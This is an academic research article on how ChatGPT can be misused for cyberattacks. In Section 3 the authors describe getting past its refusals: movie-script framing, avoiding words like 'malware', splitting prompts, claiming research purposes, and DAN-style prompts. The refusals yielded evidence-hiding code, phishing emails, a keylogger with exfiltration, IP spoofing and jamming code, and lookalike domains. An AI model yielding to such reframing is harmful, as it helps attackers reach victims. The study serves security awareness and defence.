When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots

Iqbal, Farkhund; Samsom, Faniel; Kamoun, Faouzi; MacDermott, Áine

doi:10.3389/frcmn.2023.1220243

ORIGINAL RESEARCH article

Front. Comms. Net., 04 September 2023
Sec. Security, Privacy and Authentication
Volume 4 - 2023 | https://doi.org/10.3389/frcmn.2023.1220243

When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots

Farkhund Iqbal¹*

Faniel Samsom¹

Faouzi Kamoun^2,3

Áine MacDermott⁴

¹College of Technological Innovation, Zayed University, Abu Dhabi, United Arab Emirates
²School of Engineering, ESPRIT, Tunis, Tunisia
³School of Business, ESPRIT, Tunis, Tunisia
⁴School of Computer Science and Mathematics, Liverpool John Moores University, Liverpool, United Kingdom

ChatGPT has garnered significant interest since its release in November 2022 and it has showcased a strong versatility in terms of potential applications across various industries and domains. Defensive cybersecurity is a particular area where ChatGPT has demonstrated considerable potential thanks to its ability to provide customized cybersecurity awareness training and its capability to assess security vulnerabilities and provide concrete recommendations to remediate them. However, the offensive use of ChatGPT (and AI-powered conversational agents, in general) remains an underexplored research topic. This preliminary study aims to shed light on the potential weaponization of ChatGPT to facilitate and initiate cyberattacks. We briefly review the defensive usage of ChatGPT in cybersecurity, then, through practical examples and use-case scenarios, we illustrate the potential misuse of ChatGPT to launch hacking and cybercrime activities. We discuss the practical implications of our study and provide some recommendations for future research.

1 Introduction

At the end of November 2022, Open Artificial Intelligence (OpenAI, 2022) officially released ChatGPT, an AI-powered chatbot that marked a milestone in the development of AI-powered conversational language models. ChatGPT is a Natural Language Processing (NLP) model that enables users to engage in human-like conversations that are highly coherent and realistic. ChatGPT is based on a language model architecture created by OpenAI called the Generative Pre-trained Transformer (GPT) (OpenAI, 2023). Table 1 provides a brief summary of the related works. Generative AI (GAI) is a field of artificial intelligence that focuses on generating new and original data or content by being pre-trained on massive datasets, using advanced learning algorithms. Once pre-trained, the generative models are fine-tuned on specific tasks to address the specific need of users. GAI has a variety of potential applications, including computer vision, natural language processing, speech recognition, and the creation of new images, texts, sounds, and videos. Generative Adversarial Networks (GANs), Variational AutoEncoders (VAEs), and Autoregressive Models such as Generative Pre-trained Transformer (GPT) models are among the most popular GAI models (Brown et al., 2020; Aydın and Karaarslan, 2023).

TABLE 1

TABLE 1. Literature review summary.

Transformer-based models, like GPT-2 and GPT-3, make use of the attention mechanism to produce reliable new texts, images and sounds that are remarkably similar to instances from the real world (Hariri, 2023). As a generative AI model, ChatGPT leverages transformer architecture to analyze large amounts of text data, identify patterns, and mimic the structure of natural language. ChatGPT is based on the GPT model, which makes use of the Transformer architecture’s decoder component in an autoregressive form, meaning that the output text is generated one token at a time (Sebastian, 2023; OpenAI, 2023; Hariri, 2023). The specific GPT used by ChatGPT is fine-tuned from a model in the GPT-3.5 series (OpenAI, 2023). On 14 March 2023, OpenAI announced the release of GPT-4. GPT-4 is a 100 trillion parameter, multimodal, large-scale model that accepts images and text as input and can produce text output. On established NLP benchmarks, GPT-4 stands today among the top advanced conversational models (OpenAI, 2022).

What makes ChatGPT particularly distinctive is the application of Reinforcement Learning from Human Feedback (RLHF) (Uc-Cetina et al., 2022; Radford et al., 2018). According to OpenAI, human AI trainers used RLHF to feed the model with conversations in which they acted as both users and AI assistants (OpenAI, 2023). The generated reward model is used to optimize GPT with a reinforcement learning algorithm and it allows ChatGPT to generate sensible and demonstrative text when it is fine-tuned for specific tasks (Radford et al., 2018).

ChatGPT is a powerful extension to traditional search engines as well since the model is now built into search engines and web browsers from Microsoft. Additionally, Alphabet has revealed that its AI-based conversational model will soon be available on the Google search engine (Griffith, 2023). However, there is a significant distinction between ChatGPT and search engines. ChatGPT is a language model that can understand natural language and engage in human-like conversations to provide explanations or answer specific queries. On the other hand, a search engine indexes web pages on the internet to assist users in finding the information they are looking for. ChatGPT is not able to search the internet for information, and it generates a response using the knowledge it acquired from training data which leaves room for potential errors and biases (Bubeck et al., 2023).

ChatGPT has currently over 100 million users and its website generates over one billion visitors per month, making it among the most popular AI-powered conversational tools (Nerdy NAV, 2023). Other conversational models include Amazon Lex, Microsoft Bot, Google Dialogflow, and IBM Watson Assistant, among others.

ChatGPT has been applied across various industries and domains, including customer service, healthcare, education, marketing, finance, and entertainment. Defensive cybersecurity is a particular area where ChatGPT has demonstrated considerable potential thanks to its ability to analyze large data sets such as security logs and alerts, and its ability to identify threat patterns and generate customized cybersecurity guidelines and procedures. However, the offensive use of ChatGPT (and AI-powered conversational agents, in general) remains an underexplored research topic.

Kamoun et al. (2020) have shown how AI and Machine Learning Software (MLS) have become a mixed blessing for cybersecurity. ChatGPT and other AI-powered conversational models are no exception. In fact, while the InfoSec community is turning to AI/MLS to strengthen their cybersecurity defenses (Mijwil and Alijanabi, 2023; Haleem et al., 2023), some hackers and cybercriminals are trying to weaponize AI/MLS for malicious use (Kamoun et al., 2020). We, therefore, argue that it is important for the InfoSec community to understand the mechanisms by which cyber criminals can tweak ChatGPT and turn it into a potential cyber threat agent. Extending the research work by Kamoun et al. (2020), the aim of this exploratory study is threefold: 1) briefly highlight the defensive facet of ChatGPT in cybersecurity, 2) shed light on the potential adversarial usage of ChatGPT in the context of cybersecurity through illustrative use cases and scenarios, and 3) discuss the implications of the dark side of AI-powered conversational agents.

The remainder of this paper is structured as follows. Section 2 presents a summary of the usage of ChatGPT in cybersecurity defense. Section 3 illustrates via use cases how ChatGPT can be misused to facilitate, and launch cyberattacks. Section 4 highlights the practical implications of weaponized AI-powered conversational models on the future of cybersecurity and provides a summary of the paper and some suggestions for future research.

2 ChatGPT for cybersecurity defense

When used as standalone tools or in conjunction with other traditional defense mechanisms (such as firewalls, encryption, secure passwords, and threat detection and response systems), ChatGPT and other AI-powered conversational models can assist in improving organizational security posture. In this section, we provide a summary of the key applications of ChatGPT in cybersecurity defense. For additional details, we refer the reader to the previous work of Mijwil and Aljanabi (2023) and Kucharavy et al. (2023).

ChatGPT can be integrated into the organizational cybersecurity strategy to enable quick detection and response to cyber threats, among others. For instance, as ChatGPT can analyze a vast amount of data, it can also assist in identifying patterns and trends of data usage, supervise network activity and generate reports on the overall cybersecurity of institutions (Gaur, 2023; Haleem et al., 2023). Additionally, ChatGPT can be used to create honeypots by issuing commands that simulate Linux, Mac, and Windows terminals and by logging the attacker’s actions which can allow security teams to 1) collect information about attackers, including their tactics, techniques, and procedures (TTPs) and 2) detect potential vulnerabilities before they can cause significant damage (McKee and Noever, 2022a; McKee and Noever, 2022b).

ChatGPT can contribute towards enhancing cybersecurity in many other aspects such as:

- Providing customized cybersecurity awareness training, security guidelines, and procedures including security incidence reports.

- Conducting vulnerability assessment and providing an action plan on how to remediate the identified vulnerabilities.

3 ChatGPT as a potential cybersecurity threat

The swift proliferation of AI has resulted in the emergence of an impending risk of AI/MLS-based attacks (Kirat et al., 2018). Access to open-source AI/MLS models, tools, libraries frameworks, AI-powered chatbots, and pre-trained deep learning models makes it easier for hackers to adapt AI models and tools to arm their hacking activities and exploits with more intelligence and efficiency (Kamoun et al., 2020). As a Generative AI conversational model, ChatGPT is not an exception. Today, the potential misuse of ChatGPT and other AI-based conversational agents to launch cyberattacks remains an underexplored research topic.

Despite its potential role in raising cybersecurity awareness and thwarting cyberattacks, ChatGPT can be misused and tweaked to generate malicious code and launch cyberattacks. Previously, cybercriminals were frequently limited in their ability to undertake sophisticated attacks due to the need for coding and scripting expertise, which may entangle creating new malware and password-cracking scripts (Sebastian, 2023). Although search engines can provide information in response to one’s search (keyword-based query) for potential online hacking resources and tools, often these agents return a long list of potential web pages that users must navigate through to find the proper information pertaining to their specific needs. Some of the search results might not be relevant, especially for complex or ambiguous queries. On the other hand, as demonstrated below, users with basic coding skills can tweak ChatGPT to assist them in malware scripting and coding with minimum effort and in record time, thus, lowering cybercrime’s barrier to entry. In fact, unlike keyword-based search engines, ChatGPT and AI-based conversational agents can understand and interpret the context of a user query and provide personalized and relevant responses even under complex and ambiguous scenarios.

It is worth mentioning that ChatGPT endorses ethical and legal guidelines for user behavior, content, and terms of use to prevent unethical and illegal activities. Many queries that incite potential malicious use are denied and an explanation is provided to explain the reasons. However, there are several ways to lure ChatGPT to circumvent the security and ethical filters put in place to prevent any unethical or harmful content from being generated or communicated. For instance, the WikiHow website (wikiHow, 2023) provides some tips with concrete examples of how to get around ChatGPT security filters. These include Using the “Yes Man” or DAN (Do Anything Now) master prompts, or framing the prompt as a movie script dialogue with characters completing a “fictional” task. In the latter case, a user can structure questions as conversations between fictional characters who need to find a way to solve a challenge that can involve hacking a computer system.

To illustrate how rephrasing a prompt in a way that does not implicitly convey malicious intent or illegal activity can lure ChatGPT to generate a malicious response, consider the following case:

We asked ChatGPT to provide the commands needed to hide potential digital forensic evidence from a Parrot drone in case it gets captured. The request was declined based on ethical and legal arguments as illustrated in Figure 1.

FIGURE 1

FIGURE 1. ChatGPT’s initial response.

We then reframed the same request in a different context by invoking a movie script scenario as illustrated in Figure 2. This time ChatGPT responded with the source code (along with some explanations) that we were able to validate experimentally.

FIGURE 2

FIGURE 2. ChatGPT’s second response.

Kamoun et al. (2020) classified AI/MLS-powered cyber-attacks by their activities (actions) into seven categories in terms of probing, scanning, spoofing, flooding, misdirecting, executing, and bypassing. Some of these actions apply to ChatGPT as discussed in the sequel.

3.1 ChatGPT for misdirection

Misdirection in the context of this study refers to the potential misuse of ChatGPT to deliberately lie to a target and provoke an action based on deception; such is the case of cross-site scripting and email scams (Kamoun et al., 2020). This application has been the subject of growing interest among the cybersecurity community. We focus on two ChatGPT-enabled potential misdirection threats, namely, phishing and malicious domain name generation.

Phishing is one of the most common social engineering cyberattacks. We distinguish massive (global) phishing that aims to create simple and sound emails with the minimum effort possible, and spear (targeted) phishing that requires social-engineering skills, huge efforts, and thorough probing of targets (Giaretta and Dragoni, 2020).

Since the inception of the Internet, cybercriminals have used email phishing as the primary attack vector for spamming, and creating malicious URLs, attack payloads, and other illicit content (Ansari et al., 2022; Cambiaso and Caviglione, 2023). A recent CISCO cybersecurity threat trend report revealed that 90% of organizational data breaches are traced to phishing attacks (Cisco, 2021).

Singh and Thaware (2017) investigated how spammers can use AI/MLS to improve the success rate of their Business Email Compromise (BEC) scam phishing attacks by crafting customized genuine-looking emails.

Giaretta and Dragoni, 2020 demonstrated how Natural Language Generation (NLG) techniques can enable attackers to target large community audiences with machine-tailored emails. For this purpose, they proposed the Community Targeted Phishing (CTP) technique to automatically craft such emails.

The conversational and interactive aspects of ChatGPT made it convenient for attackers to craft personalized tailor-made convincing phishing emails. ChatGPT has a convincing human-like capability by generating responses that are fluent and natural-sounding (Kaminsky, 2023). Previously, attackers had to send phishing emails in bulk. However, those emails are easily recognizable as they are impersonalized and contain mostly generic text. ChatGPT could provide a solution to this limitation as it is able to refine the malicious email through iterative conversations until creating convincing phishing at a large scale (Baki et al., 2017). This is also echoed by Dash and Sharma (2023) who noted that ChatGPT is poised to excel in preparing social engineering templates thanks to its powerful human-like text generation capacity. ChatGPT has also enabled threat actors to create multiple variations of social engineering attacks quickly and easily, which results in a higher probability of success (Cambiaso and Caviglione, 2023).

In an experiment, inspired by (Giaretta, and N. Dragoni, 2020), we requested ChatGPT to draft an email to impersonate a scholar and invite a young researcher to collaborate, while providing a link that will redirect the target to a fake login page that resembles Google login page. The resulting conversation is illustrated in Figure 3.

FIGURE 3

FIGURE 3. A phishing email generated by ChatGPT.

In a second experiment, we explored the potential of ChatGPT to draft a convincing phishing email in a language other than English. Translating a phishing email from English to another language often yields a stilted translation text that lacks coherence and Genuity. On the other hand, being trained on vast amounts of data, ChatGPT can understand the nuances of a particular language and produce text in different languages with much better quality in terms of accuracy, contextual understanding, and personalization. Such a capability can enable hackers to increase the success rate of their phishing attacks against target victims whose first language is not English, hence enlarging the scope of their phishing attacks to a global scale. Figure 4 illustrates ChatGPT’s capability to generate the same email used in the previous scenario in Arabic with impressive accuracy and a natural-sounding manner.

FIGURE 4

FIGURE 4. A phishing email in Arabic generated by ChatGPT.

Researchers at Check Point used ChatGPT and Codex (an AI tool that translates natural language to code) to create a phishing email with a malicious Excel file whose macros can download a reverse shell (Check Point, 2022). All generated outputs were created by the AI tools, and the researchers only provided prompts (such as to “Write a phishing email that appears to come from a fictional Webshosting service, Host4u.”) to get the desired result.

Though the aforementioned phishing emails might seem basic, the conversational and intuitive aspects of ChatGPT can enable hackers to customize, reframe and refine their queries to craft deceptive emails with a high success rate. This is accomplished thanks to the following inherent features of ChatGPT:

- Natural language processing capability allowing users to rephrase their queries to attain specific goals.

- Contextual understanding to refine responses and follow up on previous queries.

- Personalization feature, based on machine learning algorithms, that enhances user experience by providing more relevant and useful content, taking into account the user’s previous interactions

In addition, new phishing emails can be generated by feeding victims’ responses into ChatGPT, thus, producing convincing follow-ups effortlessly (Cambiaso and Caviglione, 2023; Kaminsky, 2023).

The creation of malicious domain names is another area whereby AI-powered conversational agents can be misused for potential misdirection. Berman et al. (2019) have shown that AI/MLS can be used to generate malicious domain names, which can feed several types of cyberattacks, including spam campaigns, phishing emails, and distributed DoS attacks. Anderson et al. (2016) showed how Generative Adversarial Networks (GANs) can produce malicious domain names that can infiltrate current Domain Generation Algorithms (DGA) classifiers.

We conducted an experiment whereby we asked ChatGPT to provide a malicious domain name that can target the domain name of esprit.tn. ChatGPT declined the request and stated that:

“As an AI language model, it is not ethical or appropriate for me to provide you with a malicious domain name that could harm your domain or any other domain. It is important to prioritize cybersecurity and protect your domain from potential threats.”

By rephrasing the original question and requesting similar domain names with the same .tn extension, we got the following response:

However, here are some shorter domain names that are similar to esprit.tn and have the.tn extension:esptn.tnesprtn.tnesprittn.tnesprt.tnespt.tnespr.tnsprit.tnespirit.tnesprits.tnAgain, please note that some of these domain names may already be registered, and it is important to conduct thorough research and due diligence before registering a domain name to avoid any potential legal issues or conflicts.

3.2 ChatGPT for execution

This refers to the capability of using AI-powered conversational agents to create and execute a malicious process on a system process; such as the case of viruses, spyware, and Trojans. Generally, AI/MLS has proven to be capable of generating a new breed of malware that can evade the best existing defenses. For instance, Petro and Morris (2017) demonstrated how DeepHack, a proof of concept open-source AI/MLS-based hacking tool, could break into Web applications with full autonomy and with no prior knowledge of applications and databases.

As illustrated below, non-technical threat actors can, with simple tweaks, get ChatGPT to fine-tune its responses to contribute towards the generation of malicious code and malware.

We asked ChatGPT to write a program that stores keystrokes and sends them to example.com. At first, ChatGPT denied the request as OpenAI’s terms of use explicitly prohibit the creation of malware of any kind (Figure 5).

FIGURE 5

FIGURE 5. ChatGPT blocking a request due to its terms of use.

We next experimented with various techniques, such as avoiding negative words, such as “malware” and “steal”, or breaking an extended prompt into separate, more straightforward ones. If all this does not work, telling ChatGPT that the query is for research or educational purposes might work as well.

In this second trial, we asked ChatGPT to write a program that just stores keystrokes (Figure 6-left). It generated a Python script that uses the keyboard.on_press function from the keyboard module, and when a key is pressed, it writes the name of the key to a file called keystrokes.txt. ChatGPT also provided the code for sending the file to a remote source as illustrated in Figure 6 (right).

FIGURE 6

FIGURE 6. (left) A ChatGPT-created script that secretly stores keystrokes to a file. (right) A ChatGPT-created script that sends a file to a remote source.

The above examples illustrate the possibility to weaponize ChatGPT to provide malware code. The process of generating the code can be an iterative process, each time improving and modifying the output to achieve the desired intent. Similarly, many cybercriminals have already released malware they created with ChatGPT in dark web communities. Check Point researchers have analyzed various hacking forums and discovered several instances of hackers using ChatGPT to develop malicious tools. Below we discuss three reported cases where threat actors have successfully used ChatGPT to create working malware.

- Under a thread titled “ChatGPT–Benefits of Malware,” an anonymous user disclosed the usage of ChatGPT to recreate malware strains based on prior research publications (Check Point, 2023). The same user was able to develop a Python stealer program that looks for twelve common file types, including images, PDFs, and MS Office documents, copies them to a random folder, and then uploads them to a hardcoded FTP server (Check Point, 2023).

The same user distributed other cyber exploitation projects, one of which was a Java snippet created with ChatGPT that downloads and launches a popular SSH client using PowerShell.

- In another post, an anonymous user published a Python script that performs cryptographic functions. The person revealed that it was the first script he/she ever created and used OpenAI to write it. The malware script performs different cryptographic tasks, such as creating a cryptographic key, and encrypting system files, and it could also be modified to completely encrypt the victim’s machines for the purpose of ransomware (Check Point, 2023).

- In a third post, an anonymous user discussed how to develop a dark web marketplace using ChatGPT (Check Point, 2023). The goal of the platform was to be a black market for exchanging illegal and stolen goods, such as malware, drugs, and ammunition. The person also shared a script that uses third-party APIs to get up-to-date cryptocurrency as a payment system for the platform (Check Point, 2023).

In a recent study, Mulgrew (2023) built a zero-day virus with undetectable exfiltration using only ChatGPT prompts. The malware was embedded into an SCR format which automatically launches on Windows. Once installed, the malware searches through various files on the computer, including images, Word documents, and PDFs, to steal data. The malware uses steganography to split the stolen data into smaller pieces and then hides them within other images on the computer. These modified images are then uploaded to a Google Drive folder to avoid detection.

We have carried out our own experiment by trying to manipulate ChatGPT to propose a malicious code consisting of an evasive attack program that activates only when it detects the face of a target individual. The initial response of ChatGPT is illustrated in Figure 7.

FIGURE 7

FIGURE 7. ChatGPT’s initial response.

As may be seen from Figure 7, ChatGPT response referred to a Python program. We requested ChatGPT to provide details about this code as illustrated in Figure 8.

FIGURE 8

FIGURE 8. ChatGPT detailed code for the evasive attack program.

This exercise can continue further to elicit more details regarding the complete source code of the evasive attack program.

As a side note, it is worth mentioning that given the advanced anti-malware tools available in the market, the effectiveness of the malware samples generated by ChatGPT might be limited. For instance, Borrero (2023) and Crothers et al. (2023) observed that some malware samples created with the assistance of ChatGPT were either non-functional or easily detected by firewalls and antivirus tools.

3.3 ChatGPT for scanning

This refers to using ChatGPT to access organizational assets sequentially to detect which assets have a specific characteristic. In operating system fingerprinting, Song et al. (2019) showcased how an Artificial Neural Network correctly identified operating systems with a 94% success rate, which is higher than the accuracy of most conventional rule-based methods.

We asked ChatGPT to provide a code to correctly identify operating systems with a high success rate. The initial and follow-up responses are depicted in Figures 9, 10, respectively.

FIGURE 9

FIGURE 9. ChatGPT initial response.

FIGURE 10

FIGURE 10. ChatGPT-generated Python source code.

As may be seen, the source code of an AI-based algorithm for identifying operating systems was successfully disclosed.

3.4 ChatGPT for flooding

This refers to using ChatGPT to potentially overload an organizational asset’s capacity.

We asked ChatGPT to provide the code for an AI-based wireless jamming attack. The initial and follow-up responses are illustrated in Figures 11, 12, respectively. As may be seen, the request was successfully processed with the code being supplied along with a few explanations.

FIGURE 11

FIGURE 11. ChatGPT’s initial response.

FIGURE 12

FIGURE 12. ChatGPT’s more detailed response with the Python source code.

In a subsequent experiment, we sent a query for an AI-based classifier to guess the content of a CAPTCHA image. CAPTCHA images are used to restrict computer-automated submissions to reduce spam and fraud and prevent automated bots from conducting malicious activities.

The initial and follow-up ChatGPT responses are illustrated in Figures 13, 14, respectively.

FIGURE 13

FIGURE 13. ChatGPT’s initial response.

FIGURE 14

FIGURE 14. ChatGPT’s more detailed response with source code.

3.5 ChatGPT for probing and vulnerability detection

Another concern with ChatGPT is its potential ability to provide malicious users with tips and step-by-step instructions on how to probe organizational assets and determine their characteristics and vulnerabilities, which can be exploited later to launch an attack. ChatGPT can analyze large amounts of data and identify vulnerabilities that traditional testing methods might overlook. This can be beneficial to both cybersecurity specialists and cyber criminals. Cybernews Researchers (Cybernews, 2023) have demonstrated how ChatGPT can assist in vulnerability detection through a simple experiment carried out on “Hack the Box,” a platform to enable entities to improve their offensive and defensive security expertise. The initial prompt was, “I am faced with a penetration testing challenge. I am on a website with one button. How would I test its vulnerabilities?”. Then, the researchers conducted a set of queries asking ChatGPT to automate the entire process, and they were able to get step-by-step instructions on where they should focus their efforts, steps to follow, and even examples of exploit codes they could use (Cybernews, 2023).

Other cybersecurity researchers have also explored the application of ChatGPT for vulnerability detection. In their experiments to find vulnerabilities in a code repository containing 129 vulnerable files, Koch (2023) found that ChatGPT has discovered more vulnerabilities than traditional tools. The code repository contains files that contain one or more vulnerabilities. When ChatGPT scanned the files for vulnerabilities, it generated genuine results that gave detailed information and deeper insights into how they could be exploited. Some of the vulnerabilities discovered by ChatGPT for the script depicted in Figure 15 (right) are as follows:

- Log injection vulnerability: The “injectLog” action method accepts a parameter “userInfo” as a string and concatenates it with the “error!!” string to log the error message. An attacker can potentially inject malicious input into the “userInfo” parameter, causing unexpected behavior or even a security breach.

- Lack of authentication and authorization: The controller does not have any authentication or authorization mechanism, which means anyone can access the “injectLog” method and log an error message. Depending on the context and use case, this could pose a security risk.

FIGURE 15

FIGURE 15. A Script for ChatGPT to review and detect vulnerabilities (Koch, 2023).

3.6 ChatGPT for spoofing

This refers to using ChatGPT to create a malicious code capable of disguising the identity of an entity. We requested ChatGPT to provide a code for IP spoofing, which is typically used by hackers to alter the headers of IP packets to forge the source IP address and hence hide the source of the attack. The initial and follow-up responses of ChatGPT are shown in Figures 16, 17, respectively. As may be seen, the request was successfully processed with the code being supplied along with a few explanations. Validating the effectiveness of the generated code in infiltrating IDS is beyond the scope of this paper.

FIGURE 16

FIGURE 16. ChatGPT’s initial response for the IP spoofing code.

FIGURE 17

FIGURE 17. ChatGPT follow-up response with the IP spoofing code details.

4 Conclusion and implications for research and practice

This study has demonstrated via concrete examples the potential of ChatGPT to “educate” and guide malicious users to discover and exploit vulnerabilities, craft convincing phishing emails, scan organizational assets and overload their capacity, hide their true identities, erase digital forensic evidence, and create malware programs that could be used to harm, disrupt, or exploit computer systems, networks, or devices. The results obtained in the experiments correspond to tests performed at the time of the research project and future ChatGPT responses might vary depending on the fixes that may be introduced to address some of the issues highlighted in this study.

Like other AI/MLS models, ChatGPT, and AI-powered conversational agents in general, can be a blessing and a curse on the cybersecurity front. ChatGPT can offer new opportunities for cybercriminals to quickly enhance their hacking skills and launch effective cyberattacks. Although the malware currently being developed using ChatGPT remain relatively simple, there are concerns that they will gain more sophistication as this AI-based conversational model is expected to evolve with more power and subtlety in future releases.

While we have not delved into all possible use cases of misusing ChatGPT for malicious intents, it is clear that the initial findings reported herein are already worrisome. Therefore, we argue that there is a need to raise awareness among cybersecurity academic and professional communities, policymakers, and legislators about the interplay between AI-powered conversational models and cybersecurity and highlight the imminent threats that weaponized conversational models can expose. The integration of AI-based conversational agents like ChatGPT into Internet search engines is also poised to bring the potential cybersecurity merits and threats of these models to a new level.

It is equally important for the providers of AI-based conversational chatbots to be mindful of the possible loopholes and vulnerabilities that malicious users can exploit and to continuously adapt their algorithms accordingly.

There are also plenty of opportunities for cybersecurity students to explore ChatGPT and other conversational models to enhance their understanding of various topics pertaining to cybersecurity concepts and practices by learning how to ask and refine queries to attain targeted goals.

Our research has showcased just a few samples of the potential offensive use of ChatGPT. It would be interesting to extend this study to include more comprehensive coverage of other potential misuse cases and to validate the success rate of the exploits generated by ChatGPT in infiltrating firewalls and Intrusion Detection Systems (IDS).

It is also recommended to proactively anticipate the potential use cases of misusing ChatGPT and share the corresponding countermeasures with the InfoSec community. We hope that this preliminary study will stimulate further contributions in the emerging field of weaponized conversational models and their implications on the future of the cybersecurity profession, education, and research.

Data availability statement

The original contributions presented in the study are included in the article/Supplementary Material, further inquiries can be directed to the corresponding author.

Author contributions

FI initiated research project with the problem statement defined and draft methodology proposed. Method was implemented and experiments conducted by FS. FK spearheaded compilation of results plus write-up of the manuscript. ÁM led the tasks of structuring and formatting with final proofreading of the paper. All authors contributed to the article and approved the submitted version.

Acknowledgments

This study is supported with Research Incentive Fund (R22022), research office, Zayed University, United Arab Emirates.

Conflict of interest

The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest.

Publisher’s note

All claims expressed in this article are solely those of the authors and do not necessarily represent those of their affiliated organizations, or those of the publisher, the editors and the reviewers. Any product that may be evaluated in this article, or claim that may be made by its manufacturer, is not guaranteed or endorsed by the publisher.

References

Anderson, H. S., Woodbridge, J., and Filar, B. (2016). DeepDGA: adversarially-tuned domain generation and detection. arXiv:abs/1610.01969. CoRR Available at: http://arxiv.org/abs/1610.01969 (Accessed October 6, 2016).

Google Scholar

Ansari, M. F., Sharma, P. K., and Dash, B. (2022). Prevention of phishing attacks using AI-based cybersecurity awareness training. Int. J. Smart Sens. Adhoc Netw. 3 (3), 61–72. doi:10.47893/ijssan.2022.1221

CrossRef Full Text | Google Scholar

Aydın, Ö., and Karaarslan, E. (2023). Is ChatGPT leading generative AI? What is beyond expectations? SSRN Electron. J. doi:10.2139/ssrn.4341500

CrossRef Full Text | Google Scholar

Baki, S., Verma, R., Mukherjee, A., and Gnawali, O. (2017). “Scaling and effectiveness of email masquerade attacks,” in Proceedings of the 2017 ACM on Asia Conference on Computer and Communications Security, Abu Dhabi, United Arab Emirates, April 2-6, 2017.

CrossRef Full Text | Google Scholar

Ben-Moshe, S., Gekker, G., and Cohen, G. (2022). OpwnAI: AI that can save the day or HACK it away. Available at: https://research.checkpoint.com/2022/opwnai-ai-that-can-save-the-day-or-hack-it-away/(Check Point Research.

Google Scholar

Berman, D. S., Buczak, A. L., Chavis, J. S., and Corbett, C. L. (2019). A survey of deep learning methods for cyber security. Information 10 (4), 122. doi:10.3390/info10040122

CrossRef Full Text | Google Scholar

Brown, T. B., Mann, B., Ryder, N., Subbiah, M., Kaplan, J., Dhariwal, P., et al. (2020). Language models are few-shot learners CoRR. arXiv:2005.14165. Available at: https://arxiv.org/abs/2005.14165 (Accessed May 28, 2020).

Google Scholar

Bubeck, S., Chandrasekaran, V., Eldan, R., Gehrke, J., Horvitz, E., Kamar, E., et al. (2023). Sparks of artificial general intelligence: early experiments with GPT-4. arXiv:2303.12712 [cs]. Available at: https://arxiv.org/abs/2303.12712 (Accessed March 22, 2023).

Google Scholar

Cambiaso, E., and Caviglione, L. (2023). Scamming the scammers: using ChatGPT to reply mails for wasting time and resources. Ithaca, New York: Cornell University. arXiv. doi:10.48550/arxiv.2303.13521

CrossRef Full Text | Google Scholar

Check Point Research (2023). Opwnai: cybercriminals starting to use ChatGPT. Available at: https://research.checkpoint.com/2023/opwnai-cybercriminals-starting-to-use-chatgpt/.

Google Scholar

Crothers, E., Japkowicz, N., and Viktor, H. (2023). Machine generated text: a comprehensive survey of threat models and detection methods. arXiv:2210.07321 [cs]. Available at: https://arxiv.org/abs/2210.07321 (Accessed October 13, 2022).

CrossRef Full Text | Google Scholar

Dash, B., and Sharma, P. (2023). Are ChatGPT and deepfake algorithms endangering the cybersecurity industry? A review. Int. J. Eng. Appl. Sci. (IJEAS) 10 (1). doi:10.31873/IJEAS.10.1.01

CrossRef Full Text | Google Scholar

Gaur, K. (2023). Is ChatGPT boon or bane for cyber risk management? Available at: https://www.cioandleader.com/article/2023/02/20/chatgpt-boon-or-bane-cyber-risk-management (Accessed June 13, 2023).

Google Scholar

Giaretta, A., and Dragoni, N. (2020). Community targeted phishing: a middle ground between massive and spear phishing through Natural Language generation. arXiv:1708.07342 [cs]. Available at: https://arxiv.org/abs/1708.07342 (Accessed August 24, 2017).

Google Scholar

Griffith, E. (2023). ChatGPT vs. Google search: in head-to-head battle, which one is smarter? [online] PCMAG. Available at: https://www.pcmag.com/news/chatgpt-vs-google-search-in-head-to-head-battle-which-one-is-smarter#:∼:text=The%20research%20also%20took%20into (Accessed June 13, 2023).

Google Scholar

Haleem, A., Javaid, M., and Singh, R. P. (2023). An era of ChatGPT as a significant futuristic support tool: a study on features, abilities, and challenges. BenchCouncil Trans. Benchmarks, Stand. Eval. 2 (4), 100089. doi:10.1016/j.tbench.2023.100089

CrossRef Full Text | Google Scholar

Hariri, W. (2023). Unlocking the potential of ChatGPT: a comprehensive exploration of its applications, advantages, limitations, and future directions in Natural Language Processing. arXiv:2304.02017 [cs]. Available at: https://arxiv.org/abs/2304.02017 (Accessed March 27, 2023).

Google Scholar

Kaminsky, S. (2023). How ChatGPT will change cybersecurity. Available at: https://www.kaspersky.com/blog/chatgpt-cybersecurity/46959/(Accessed June 13, 2023).

Google Scholar

Kamoun, F., Iqbal, F., Esseghir, M. A., and Baker, T. (2020). “AI and machine learning: a mixed blessing for cybersecurity,” in 2020 International Symposium on Networks, Computers and Communications (ISNCC), Montreal, QC, Canada, October 20-22, 2020 (IEEE), 1–7.

CrossRef Full Text | Google Scholar

Kengly, R. (2023). How to bypass ChatGPT’s content filter: 4 simple ways. wikiHow. Available at: https://www.wikihow.com/Bypass-Chat-Gpt-Filter.

Google Scholar

Kirat, D., Jang, J., and Stoecklin, M. (2018). DeepLocker concealing targeted attacks with AI locksmithing. Available at: https://i.blackhat.com/us-18/Thu-August-9/us-18-Kirat-DeepLocker-Concealing-Targeted-Attacks-with-AI-Locksmithing.pdf.

Google Scholar

Koch, C. (2023). I used GPT-3 to find 213 security vulnerabilities in a single codebase medium. Available at: https://betterprogramming.pub/i-used-gpt-3-to-find-213-security-vulnerabilities-in-a-single-codebase-cc3870ba9411 (Accessed June 13, 2023).

Google Scholar

Kucharavy, A., Schillaci, Z., Maréchal, L., Würsch, M., Dolamic, L., Sabonnadiere, R., et al. (2023). Fundamentals of generative large language models and perspectives in cyber-defense. Ithaca, New York: Cornell University. arXiv. doi:10.48550/arxiv.2303.12132

CrossRef Full Text | Google Scholar

McKee, F., and Noever, D. (2022a). Chatbots in a botnet world. arXiv:2212.11126 [cs]. Available at: https://arxiv.org/abs/2212.11126 (Accessed December 18, 2022).

Google Scholar

McKee, F., and Noever, D. (2022b). Chatbots in a botnet world. Int. J. Cybern. Inf. 12 (2), 77–95. doi:10.5121/ijci.2023.120207

CrossRef Full Text | Google Scholar

Mijwil, M., Aljanabi, M., and ChatGPT, (2023). Towards artificial intelligence-based cybersecurity: the practices and ChatGPT generated ways to combat cybercrime. Iraqi J. Comput. Sci. Math. 4 (1), 65–70. doi:10.52866/ijcsm.2023.01.01.0019

CrossRef Full Text | Google Scholar

